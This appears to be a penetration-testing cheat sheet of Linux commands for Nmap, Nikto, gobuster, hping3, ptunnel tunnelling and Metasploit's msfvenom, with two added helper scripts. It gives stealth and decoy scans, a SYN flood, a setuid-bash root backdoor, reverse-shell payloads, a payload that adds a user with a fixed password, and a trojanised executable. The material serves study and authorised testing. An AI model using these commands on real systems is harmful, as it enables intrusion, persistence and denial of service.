EHPT Notes

The document provides a comprehensive guide on various Linux tools and commands for penetration testing, including installation commands, usage examples, and descriptions of functionalities. It covers tools like Nmap, Nikto, hping3, and Metasploit, detailing how to perform scans, create payloads, and utilize tunneling techniques. Additionally, it includes commands for monitoring network traffic and managing environmental variables.

Uploaded by

achiever8888

-----------------------------------------------------------------------------------
General
-----------------------------------------------------------------------------------
# apt install git wget curl make cpp default-jre htop python3-pip firefox mousepad libreoffice-calc gparted gnome-disk-utility snapd
- General Linux Tools (the apt package that provides pip is "python3-pip")

# apt install glogg ksystemlog
- Linux Log Viewing Tools

# apt install nmap netcat socat nikto iftop hping3 ptunnel gobuster sublist3r tshark
- Linux EHPT Tools

# apt install seclists
- Installs many wordlists in /usr/share/seclists (the package name is "seclists", not "seclist")

# grep -Hnri [name] | vim -
- Will open the output in VIM (GNU grep with "-r" and no path searches the current directory)
- In VIM ":%!" is used for advanced filter commands, e.g. ":%!sort" will sort the output
- ":%!grep -v [text]" will remove the lines containing [text]

# ping -s 1000 [Target]
- Send large Ping Packets of size 1000 to test Firewall Capabilities

# ping -s 1000 -f [Target]
- Flood Ping with large Packets of size 1000 to test Firewall Capabilities (needs root)

# apt install iftop
- Install "iftop"

# iftop
- Will monitor network traffic & display a table of current bandwidth usage

# curl -i [Website-Target]
- Displays the HTTP response headers (server, cookies, redirects) together with the body of [Website-Target]

# wget [Target]
- Will download the file from the [Target]

# nmap -T4 -sS -sU -O -sV -sC -p- [Target]
- SYN Stealth Scan, All UDP, OS Detection, Version Detection, Default Scripts, All Ports
- nmap accepts only one TCP scan type per run, so "-sS" and "-sT" cannot be combined; "-sU" can be added to either
- We can use "-A" instead of "-O", "-sV" & "-sC" (it also adds "--traceroute")

# nmap -D RND:10 [LAN-Target]
- Scan with Decoys using 10 Random IP Addresses (in this example) to avoid detection

# nmap -D [Decoy IP] [Target]
- Scan the [Target] with the specified [Decoy IP]

# nmap -sA [Target]
- ACK Probe Scan. Ports reported as "filtered" indicate an active (stateful) Firewall

# nmap --source-port 53 [Target]
- Scan [Target] with a specific Source Port

# nmap -f [Target]
- Fragment the packet, making it harder to detect us while we scan

# nmap -sn [Target-Network]
- Scan for live hosts inside [Target-Network] (ping sweep, no port scan)

# nmap -sL [Target-Network]
- List Scan: resolves the host names of every address in [Target-Network] without sending probes to the hosts

# nmap --script malware [Target]
or
# nmap -sV --script=http-malware-host [Target]
- Scan for known Malware

# nmap --script=sniffer-detect [LAN-Target]
- Scan and detect if a Sniffer is active

# alias a="ls"
- Will create an alias "a" for the command "ls" (the alias name comes first, the command second)

# nikto -h [Website-Target]
- Scan [Website-Target] for basic vulnerability

# nikto -h [Website-Target] -ssl
- Scan [HTTPS Website-Target] for basic vulnerabilities

# nikto -h <IP or hostname> -Format msf+
- Scan [Website-Target] for basic vulnerabilities & pass the results to Metasploit

# gobuster dir -u [Website-Target] -w [Wordlist]
- Scan for Directories & Files on the [Website-Target] using a [Wordlist] (the URL must be given with "-u")
- Kali Wordlist Path = /usr/share/wordlists or /usr/share/seclists

# sublist3r -d [Website-Target]
- Enumerates & list out the subdomains of the [Website-Target]

# Searchsploit
- # git clone https://gitlab.com/exploit-database/exploitdb.git /opt/exploitdb
- # ln -sf /opt/exploitdb/searchsploit /usr/local/bin/searchsploit
- # searchsploit ssh - Will search for SSH Exploits
- # searchsploit -u - Will update the searchsploit database

$ sudo chmod +s /bin/bash
- Will create a backdoor with a persistence mechanism by adding the 'setuid' bit to "/bin/bash"
- "bash -p" - Will directly give "root" access.
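Added example (not part of the original notes): how a defender spots the setuid-shell persistence just described. It lists setuid files under a tree and flags any whose name is a shell; the demo tree it builds in a temp directory is constructed, and POSIX find/stat are assumed.

```shell
#!/bin/sh
# Added example, not from the original notes: detect a setuid bit on a shell
# binary, which is what "chmod +s /bin/bash" leaves behind.

# List regular files below $1 that carry the setuid bit, one path per line.
find_setuid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# Print setuid files whose basename is a shell (bash, sh, dash, zsh, ksh).
# Returns 1 when at least one is found, 0 when the tree is clean.
check_setuid_shells() {
    found=0
    for f in $(find_setuid "$1"); do
        case "$(basename "$f")" in
            bash|sh|dash|zsh|ksh)
                mode=$(stat -c %a "$f" 2>/dev/null || stat -f %Lp "$f")
                echo "ALERT: setuid shell $f (mode $mode)"
                found=1 ;;
        esac
    done
    return $found
}

# Constructed demo tree: one ordinary binary and one setuid "bash" copy.
demo_dir=$(mktemp -d)
mkdir -p "$demo_dir/bin"
: > "$demo_dir/bin/ls";   chmod 755  "$demo_dir/bin/ls"
: > "$demo_dir/bin/bash"; chmod 4755 "$demo_dir/bin/bash"   # result of chmod +s

check_setuid_shells "$demo_dir" || echo "remediate with: chmod u-s <path>"
rm -rf "$demo_dir"
```

On a real host run `check_setuid_shells /` as root and compare the list against the package manager's expected setuid set.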

# tcpdump -i any icmp
- "tcpdump" will monitor ICMP traffic on every Network Interface using "-i any"

# tcpdump -w [name.pcap] -i [interface]
- Will capture all traffic on the [interface] & save it in the [name.pcap] file

# tcpdump -r [name.pcap]
- Will read back and analyze the file [name.pcap]

# tcpdump -i [interface] -c 100
- Will capture only 100 packets

# tshark -V -c 1 -i [interface]
- Will capture only 1 packet, but with more details

# printenv
- Will print the current Environmental Variables

# ".bashrc"
- Bash Shell Startup File

# Global Variables
- Also called Environment Variables

# Local Variables
- Also called Shell Variables
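Added example (not from the original notes) to make the Global/Environment versus Local/Shell variable distinction concrete: a shell variable stays in the current shell, only exported variables reach child processes, and "printenv" lists the exported ones alone. Variable names and the helper functions are assumptions for the demo.

```shell
#!/bin/sh
# Added example, not from the original notes: environment (global) versus
# shell (local) variables.

# Define one of each kind. Call it directly (not inside $(...)) so the
# assignments land in the calling shell.
setup_vars() {
    LOCAL_ONLY="shell-var"        # local / shell variable
    export GLOBAL_VAR="env-var"   # global / environment variable
}

# Ask a child process what it can see; prints "<LOCAL_ONLY>|<GLOBAL_VAR>".
child_view() {
    sh -c 'printf "%s|%s" "$LOCAL_ONLY" "$GLOBAL_VAR"'
}

# Names defined in this shell but absent from the environment, one per line.
# "set" prints every variable, "env" only the exported ones; "comm -23"
# keeps the names that appear in the first list only.
shell_only_vars() {
    all=$(mktemp); exported=$(mktemp)
    set | sed -n 's/^\([A-Za-z_][A-Za-z0-9_]*\)=.*/\1/p' | sort -u > "$all"
    env | sed -n 's/^\([A-Za-z_][A-Za-z0-9_]*\)=.*/\1/p' | sort -u > "$exported"
    comm -23 "$all" "$exported"
    rm -f "$all" "$exported"
}

setup_vars
echo "this shell : LOCAL_ONLY=$LOCAL_ONLY GLOBAL_VAR=$GLOBAL_VAR"
echo "child shell: $(child_view)"      # LOCAL_ONLY is empty in the child
echo "shell-only : $(shell_only_vars | tr '\n' ' ')"
```

An "export" placed in ".bashrc" is what turns such a setting into an environment variable for every interactive shell and its children.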

-----------------------------------------------------------------------------------
"hping3" to test Firewall Capabilities
-----------------------------------------------------------------------------------
# apt install hping3
- Install "hping3"

# hping3 -S -V --flood [Target]
- Will flood the target with SYN Packets using "-S"

# hping3 --traceroute -V -1 [Target]
- Advanced Traceroute with ICMP using the "-1" option

# hping3 --traceroute -V -p 80 -S [Target]
- Advanced Traceroute with SYN Packets using "-S" & to port 80 using "-p"

# hping3 --traceroute -V -p 80 -S -A [Target]
- Advanced Traceroute with SYN Packets using "-S" & to port 80 using "-p" & with the ACK Flag using "-A"

# hping3 --traceroute -V -p 80 -S -A --baseport 5555 [Target]
- Advanced Traceroute with SYN Packets using "-S" & to port 80 using "-p" & with the ACK Flag using "-A" & using local port "5555"

# hping3 --traceroute -V -p 53 --udp [Target]
- Advanced Traceroute with UDP Packets using "--udp" & to port 53 using "-p"

-----------------------------------------------------------------------------------
Tunneling using "ptunnel" for Evading Firewall
-----------------------------------------------------------------------------------
# apt install ptunnel
- Install "ptunnel"
# ptunnel
- Run on the [Target]

# ptunnel -p [Proxy-Address] -lp [Our-Local-Port] -da [Destination-Address] -dp [Destination-Port]
- Run on the attacker system. [Proxy-Address] is the host where "ptunnel" was started above; use a [Destination-Port] like SSH. This will tunnel SSH traffic inside ICMP
- Example : ptunnel -p 127.0.0.1 -lp 8888 -da 192.168.1.2 -dp 22
- # ssh -p 8888 user@127.0.0.1 - Will ssh to 192.168.1.2 through the ICMP Tunnel (connect to the local listening port 8888; ptunnel forwards it to 192.168.1.2:22)

-----------------------------------------------------------------------------------
Penetration Testing & Metasploit
-----------------------------------------------------------------------------------

# msfvenom -h
- Display Help

# msfvenom -l payloads #Payloads
- List Payloads

# msfvenom -l encoders #Encoders
- List Encoders

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Local-Host-IP] LPORT=[Local-Port] -f exe > name.exe
- Create basic Reverse TCP Payload

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=[Local-Host-IP] LPORT=[Local-Port] -f exe -e x86/shikata_ga_nai -i 5 -b '\x00\xff' > name.exe
- Creates Reverse TCP Encoded Payload

# msfvenom -p windows/adduser USER=attacker PASS=attacker@123 -f exe > adduser.exe
- Create Windows USER

# msfvenom -p windows/shell/reverse_tcp LHOST=[Local-Host-IP] LPORT=[Local-Port] -f exe > prompt.exe
- Create Payload for CMD Shell

# msfvenom -p windows/shell_reverse_tcp LHOST=[Local-Host-IP] LPORT=[Local-Port] -x /usr/share/windows-binaries/existing.exe -f exe -o new.exe
- Embed the Payload inside an Existing Executable
